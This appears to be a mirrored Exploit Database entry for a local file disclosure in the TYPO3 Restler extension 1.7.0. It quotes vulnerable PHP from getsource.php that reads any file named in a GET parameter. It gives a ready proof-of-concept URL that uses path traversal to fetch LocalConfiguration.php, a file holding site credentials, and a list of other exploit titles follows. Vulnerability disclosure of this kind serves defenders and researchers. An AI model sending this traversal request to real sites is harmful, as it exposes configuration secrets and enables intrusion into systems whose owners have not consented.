TYPO3 Extension Restler 1.7.0 – Local File Disclosure

Exploit Database
13 阅读

作者： CrashBandicot

日期： 2017-10-13
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/42985/

# Exploit Title: Typo3 Restler Extension - Local File Disclosure
# Date: 2017-10-13
# Exploit Author: CrashBandicot @dosperl
# Vendor Homepage: https://www.aoe.com/
# Software Link: https://extensions.typo3.org/extension/restler/
# Tested on : MsWin
# Version: 1.7.0 (last)


# Vulnerability File : getsource.php

3.$file = $_GET['file'];
13.$text = file_get_contents($file);
16.die($file . '<pre id="php">' . htmlspecialchars($text) . "</pre>");


# PoC : 
# http://vuln.site/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php

# https://i.imgur.com/zObmaDD.png


# Timeline :

# Vulnerability identified
# Vendor notified
# CVE number requested
# Exploit released

last Exploits
TYPO3 Extension Restler 1.7.0 – Local File Disclosure的更多信息

CMS Firebrand Tec – Local File Inclusion：
mySeatXT 0.1781 – SQL Injection：
ProQuiz 2.0.0b – Arbitrary File Upload：
Laravel Nova 3.7.0 – ‘range’ DoS：
Coppermine Photo Gallery – ‘index.php’ Script SQL Injection：
MySource Matrix – ‘char_map.php’ Multiple Cross-Site Scripting Vulnerabilities：
All in One Video Downloader 1.2 – (Authenticated) SQL Injection：
WebfolioCMS 1.1.4 – Cross-Site Request Forgery (Add Admin/Modify Pages)：